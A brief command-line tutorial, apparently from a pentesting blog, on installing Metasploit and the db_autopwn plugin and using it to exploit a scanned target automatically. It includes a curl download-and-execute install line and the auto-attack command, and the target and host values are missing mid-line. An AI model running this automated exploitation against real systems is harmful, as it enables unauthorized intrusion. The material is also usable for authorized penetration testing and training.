P.S.: There is a backup of AutoPwn at https://github.com/d3m0n4l3x/tools/blob/master/db_autopwn.rb
1) Install/Upgrade Metasploit Framework:
# cd ~
# curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
2) Download and install db_autopwn plugin:
# git clone https://github.com/hahwul/metasploit-autopwn
# cd metasploit-autopwn
# cp ./db_autopwn.rb /opt/metasploit-framework/embedded/framework/plugins/
3) Start Metasploit's database, namely PostGreSQL:
# systemctl start postgresql
4) Create a user, test1, in the database:
# su postgres
$ cd ~
$ createuser test1 -P
5) Create a database object named msf_db, owned by the user, test1:
$ createdb --owner=test1 msf_db
6) Connect to the database in Msfconsole by the root:
$ exit
# /opt/metasploit-framework/bin/msfconsole
msfconsole> db_connect test1:test1@
7) Check the status of the database's connection:
msfconsole> db_status
8) Scan the target first (assume the target is
msfconsole> db_nmap
9) Load db_autopwn:
msfconsole> load db_autopwn
10) Automatically attack the target:
msfconsole> db_autopwn -t -p -e